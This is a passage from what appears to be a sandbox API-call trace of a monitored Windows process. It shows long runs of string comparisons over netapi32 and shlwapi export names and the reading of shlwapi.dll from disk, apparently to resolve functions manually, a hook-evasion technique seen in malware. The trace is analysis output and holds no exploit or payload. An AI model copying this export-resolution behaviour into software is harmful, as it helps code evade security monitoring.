(lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0190.819] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0190.820] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0190.821] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0190.822] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0190.822] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0190.823] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0190.824] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0190.825] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0190.825] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0190.826] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0190.826] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0190.976] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0190.977] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0190.978] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0190.979] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0190.979] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0190.979] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0190.979] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0190.979] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0190.979] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0190.979] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0190.979] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0190.979] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0190.979] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0190.985] GetProcessHeap () returned 0x590000 [0190.985] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d05030 | out: hHeap=0x590000) returned 1 [0190.985] GetProcessHeap () returned 0x590000 [0190.985] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9140 [0190.985] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0190.986] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0190.986] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0190.986] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0190.986] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0190.987] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0190.987] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0190.987] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0190.987] GetProcessHeap () returned 0x590000 [0190.987] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x51148) returned 0x2d05030 [0190.987] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0190.987] ReadFile (in: hFile=0x17c, lpBuffer=0x2d05030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d05030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0190.991] CloseHandle (hObject=0x17c) returned 1 [0190.991] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0190.991] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0190.991] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0190.991] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0190.991] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0190.991] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0190.992] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0190.992] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0190.992] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0190.992] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0190.992] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0190.993] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0190.993] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0190.993] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0190.993] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0190.993] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0190.993] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0190.993] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0190.993] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0190.993] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0190.993] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0190.993] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0190.994] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0190.994] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0190.994] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0190.994] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0190.994] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0190.994] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0190.994] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0190.994] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0190.994] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0190.994] lstrcmpA (lpString1="ChrCmpIW", 